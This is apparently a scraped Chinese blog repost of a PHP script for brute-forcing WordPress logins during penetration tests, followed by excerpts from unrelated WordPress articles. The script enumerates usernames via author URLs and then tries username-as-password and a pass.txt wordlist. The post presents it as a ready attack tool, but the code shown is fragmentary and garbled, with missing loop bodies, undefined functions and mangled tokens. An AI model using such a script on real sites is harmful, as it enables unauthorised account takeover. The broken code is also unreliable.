跑wordpress使用者密碼指令碼

2021-09-11 11:25:01 字數 1228 閱讀 2903

瞌睡龍 · 2013/09/17 15:04

在做滲透測試的時候,有時候會遇到乙個wordpress部落格,如果版本比較新,外掛程式也沒有漏洞的話,可以爆破使用者名稱密碼來嘗試下。

大腦混沌情況下寫的,有bug歡迎提出,由於是php的所以跑起來比較慢,下次發包還是呼叫命令結合hydra來爆破。

原理是通過url/?author=遍歷獲取使用者名稱,然後先跑使用者名稱與密碼相同的使用者,再呼叫同目錄下pass.txt中的密碼檔案進行爆破。

預設獲取前10個使用者,可自行修改。

使用方法:

php wordpress.php 

複製**

#!php

<?php

set_time_limit(0);

$domain = $ar**[1];

//獲取使用者名稱

for ($i=1; $i <= 10; $i++)

$pattern = "/author\/(.*)\/feed/";

preg_match($pattern, $response, $name);

$namearray = $name[1];

}echo "共獲取使用者".count($namearray)."名使用者\n";

echo "正在破解使用者名稱與密碼相同的使用者:\n";

$crackname = crackpassword($namearray,"same");

$passwords = file("pass.txt");

echo "正在破解弱口令使用者:\n";

複製**

利用WordPress使用者密碼演算法規則修改使用者密碼

wordpress使用者密碼儲存在wp users資料表的user pass欄位,密碼是通過portable php password hashing framework類產生的,密碼的形式是隨機且不可逆,同乙個明文的密碼在不同時間,產生的密文也不一樣,相對來說較為安全。wordpress使用者密碼...

wordpress需要FTP使用者名稱密碼的問題

wordpress安裝刪除外掛程式需要ftp使用者名稱密碼的問題 方法一 伺服器命令操作 1 在wordpress目錄下面wp config.php末尾加入下面 if is admin 2 設定解壓的wordpress目錄的使用者和使用者組與其裡面的檔案使用者和使用者組相同 cd wordpress...

WordPress禁用使用者註冊及修改密碼的通知郵件

wordpress部落格每次有新使用者註冊或是更改密碼,都會傳送郵件通知,但是 註冊使用者很多都是用指令碼進行註冊,並非真人,這就導致郵箱被轟炸。alvincr推薦通過接受郵箱進行關鍵字設定,不是很建議修改 以免造成不穩定。以163為例,選擇設定 常規設定 來信分類 新建來信分類 檢視郵件並提取出關...